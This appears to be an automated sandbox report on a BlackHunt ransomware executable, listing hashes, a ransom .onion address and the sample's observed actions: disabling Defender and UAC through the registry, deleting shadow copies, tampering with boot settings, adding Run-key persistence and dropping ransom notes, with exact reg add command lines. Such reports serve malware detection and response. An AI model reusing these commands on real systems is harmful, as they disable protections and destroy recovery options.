Analysis
-
max time kernel
162s -
max time network
176s -
platform
windows10-2004_x64 -
resource
win10v2004-20231215-en -
resource tags
arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system -
submitted
18/01/2024, 23:44
Static task
static1
Behavioral task
behavioral1
Sample
70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe
Resource
win10v2004-20231215-en
General
-
Target
70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe
-
Size
707KB
-
MD5
c72591aaaf6d60f20f9cc4cb4110d2a8
-
SHA1
4888176e670b75ff227e10296e62f4113b2d0914
-
SHA256
70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878
-
SHA512
b438582dde261f5fc90b62f2b9db0c06db3f06dcc1bb220a43c241d87696db11ad916cd4287f57b86a2c769ff2ea7af60288c615e6b82b53f8132de86a3c6c64
-
SSDEEP
6144:wcmwdMZ0aq9arLKkdMqJ+VYg/5ICAAQs+d5zSTamgEoOFzxLza1c8Mvnh:6uaTmkZJ+naie5OTamgEoKxLWvSh
Malware Config
Extracted
C:\ProgramData\#BlackHunt_ReadMe.hta
http-equiv="x-ua-compatible"
http://sdjf982lkjsdvcjlksaf2kjhlksvvnktyoiasuc92lf.onion
Signatures
-
Deletes NTFS Change Journal 2 TTPs 1 IoCs
The USN change journal is a persistent log of all changes made to local files used by Windows Server systems.
pid Process 2424 fsutil.exe -
description ioc Process Key created \REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1392 bcdedit.exe 1640 bcdedit.exe -
Renames multiple (123) files with added filename extension
This suggests ransomware activity of encrypting all the files on the system.
-
pid Process 2544 wbadmin.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe -
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\{2C5F9FCC-F266-43F6-BFD7-838DAE269E11} = "C:\\ProgramData\\#BlackHunt_ReadMe.hta" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe -
Enumerates connected drives 3 TTPs 25 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\H: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\M: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\L: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\W: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\Y: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\G: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\B: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\I: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\X: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\J: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\R: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\P: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\A: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\S: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\Z: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\N: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\O: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\K: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\V: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\F: vssadmin.exe File opened (read-only) \??\Q: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\E: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\T: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened (read-only) \??\U: 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\7-Zip\Lang\va.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\zh-cn.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\dotnet\swidtag\Microsoft Windows Desktop Runtime - 6.0.25 (x64).swidtag 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\7-Zip\Lang\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\el.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\host\#BlackHunt_Private.key 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\sw.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\dotnet\ThirdPartyNotices.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jvmticmlr.h 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\uk.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\dotnet\swidtag\Microsoft Windows Desktop Runtime - 8.0.0 (x64).swidtag 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\jdk-1.8\include\win32\#BlackHunt_Private.key 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\et.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\host\fxr\6.0.25\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\io.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ka.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\readme.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\eu.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_Private.key 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\jdk-1.8\bin\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ja.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\pt-br.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_Private.key 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\he.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\nl.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ru.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\sl.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\tk.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\classfile_constants.h 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ar.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\host\fxr\8.0.0\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\fr.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ga.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\lv.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ext.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\swidtag\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\an.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\cy.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ca.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\be.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\eo.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\hi.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ku.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\dotnet\LICENSE.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\jdk-1.8\jre\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\7-Zip\#BlackHunt_Private.key 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\dotnet\host\fxr\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\pl.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\ta.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jawt.h 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\jdk-1.8\include\win32\bridge\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\bn.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Google\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\Java\jdk-1.8\#BlackHunt_ReadMe.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\nb.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\pa-in.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\Java\jdk-1.8\include\jni.h 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File created C:\Program Files\7-Zip\#BlackHunt_ReadMe.hta 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\lij.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe File opened for modification C:\Program Files\7-Zip\Lang\mng.txt 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 3992 schtasks.exe -
Interacts with shadow copies 2 TTPs 5 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 4604 vssadmin.exe 3184 vssadmin.exe 5072 vssadmin.exe 4484 vssadmin.exe 4632 vssadmin.exe -
Modifies registry class 10 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2\DefaultIcon reg.exe Key created \REGISTRY\MACHINE\Software\Classes\.Hunt2 reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2\ reg.exe Key created \REGISTRY\MACHINE\Software\Classes\Hunt2\DefaultIcon reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\Hunt2\DefaultIcon\ = "C:\\ProgramData\\#BlackHunt_Icon.ico" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.Hunt2 reg.exe -
Suspicious use of AdjustPrivilegeToken 13 IoCs
description pid Process Token: SeDebugPrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeRestorePrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeBackupPrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeTakeOwnershipPrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeAuditPrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeSecurityPrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeIncBasePriorityPrivilege 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Token: SeBackupPrivilege 4088 vssvc.exe Token: SeRestorePrivilege 4088 vssvc.exe Token: SeAuditPrivilege 4088 vssvc.exe Token: SeBackupPrivilege 2384 wbengine.exe Token: SeRestorePrivilege 2384 wbengine.exe Token: SeSecurityPrivilege 2384 wbengine.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4456 wrote to memory of 3336 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 97 PID 4456 wrote to memory of 3336 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 97 PID 4456 wrote to memory of 5004 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 100 PID 4456 wrote to memory of 5004 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 100 PID 4456 wrote to memory of 4768 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 102 PID 4456 wrote to memory of 4768 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 102 PID 4456 wrote to memory of 4624 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 104 PID 4456 wrote to memory of 4624 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 104 PID 4456 wrote to memory of 4056 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 106 PID 4456 wrote to memory of 4056 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 106 PID 4768 wrote to memory of 5108 4768 cmd.exe 109 PID 4768 wrote to memory of 5108 4768 cmd.exe 109 PID 5004 wrote to memory of 1960 5004 cmd.exe 108 PID 5004 wrote to memory of 1960 5004 cmd.exe 108 PID 4056 wrote to memory of 4600 4056 cmd.exe 110 PID 4056 wrote to memory of 4600 4056 cmd.exe 110 PID 4624 wrote to memory of 3208 4624 cmd.exe 111 PID 4624 wrote to memory of 3208 4624 cmd.exe 111 PID 3336 wrote to memory of 1956 3336 cmd.exe 99 PID 3336 wrote to memory of 1956 3336 cmd.exe 99 PID 4456 wrote to memory of 1180 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 114 PID 4456 wrote to memory of 1180 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 114 PID 4456 wrote to memory of 3448 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 117 PID 4456 wrote to memory of 3448 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 117 PID 4456 wrote to memory of 2488 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 119 PID 4456 wrote to memory of 2488 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 119 PID 4456 wrote to memory of 4800 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 121 PID 4456 wrote to memory of 4800 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 121 PID 1180 wrote to memory of 3292 1180 cmd.exe 123 PID 1180 wrote to memory of 3292 1180 cmd.exe 123 PID 4456 wrote to memory of 4748 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 124 PID 4456 wrote to memory of 4748 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 124 PID 3448 wrote to memory of 3960 3448 cmd.exe 126 PID 3448 wrote to memory of 3960 3448 cmd.exe 126 PID 4456 wrote to memory of 2816 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 127 PID 4456 wrote to memory of 2816 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 127 PID 4456 wrote to memory of 3104 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 128 PID 4456 wrote to memory of 3104 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 128 PID 2488 wrote to memory of 3744 2488 cmd.exe 131 PID 2488 wrote to memory of 3744 2488 cmd.exe 131 PID 4800 wrote to memory of 2520 4800 cmd.exe 133 PID 4800 wrote to memory of 2520 4800 cmd.exe 133 PID 4456 wrote to memory of 5080 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 132 PID 4456 wrote to memory of 5080 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 132 PID 4456 wrote to memory of 4560 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 135 PID 4456 wrote to memory of 4560 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 135 PID 4456 wrote to memory of 3180 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 137 PID 4456 wrote to memory of 3180 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 137 PID 4456 wrote to memory of 456 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 144 PID 4456 wrote to memory of 456 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 144 PID 4748 wrote to memory of 3328 4748 cmd.exe 138 PID 4748 wrote to memory of 3328 4748 cmd.exe 138 PID 2816 wrote to memory of 4848 2816 cmd.exe 143 PID 2816 wrote to memory of 4848 2816 cmd.exe 143 PID 4456 wrote to memory of 2964 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 141 PID 4456 wrote to memory of 2964 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 141 PID 4456 wrote to memory of 2480 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 145 PID 4456 wrote to memory of 2480 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 145 PID 4456 wrote to memory of 3996 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 146 PID 4456 wrote to memory of 3996 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 146 PID 5080 wrote to memory of 2644 5080 cmd.exe 158 PID 5080 wrote to memory of 2644 5080 cmd.exe 158 PID 4456 wrote to memory of 4996 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 149 PID 4456 wrote to memory of 4996 4456 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe 149 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLinkedConnections = "1" 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" 70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
Processes
-
C:\Users\Admin\AppData\Local\Temp\70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe"C:\Users\Admin\AppData\Local\Temp\70ad480aeb3a9f350259689c0f0ade85f1a2f25430bbb8850f8cbe288f8ee878.exe"1⤵
- UAC bypass
- Checks computer location settings
- Checks whether UAC is enabled
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- System policy modification
PID:4456 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:3336 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2" /f3⤵
- Modifies registry class
PID:1956
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:5004 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\.Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:1960
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4768 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2" /f3⤵
- Modifies registry class
PID:5108
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f2⤵
- Suspicious use of WriteProcessMemory
PID:4624 -
C:\Windows\system32\reg.exereg add "HKEY_LOCAL_MACHINE\Software\Classes\Hunt2\DefaultIcon" /ve /t REG_SZ /d "C:\ProgramData\#BlackHunt_Icon.ico" /f3⤵
- Modifies registry class
PID:3208
-
-
-
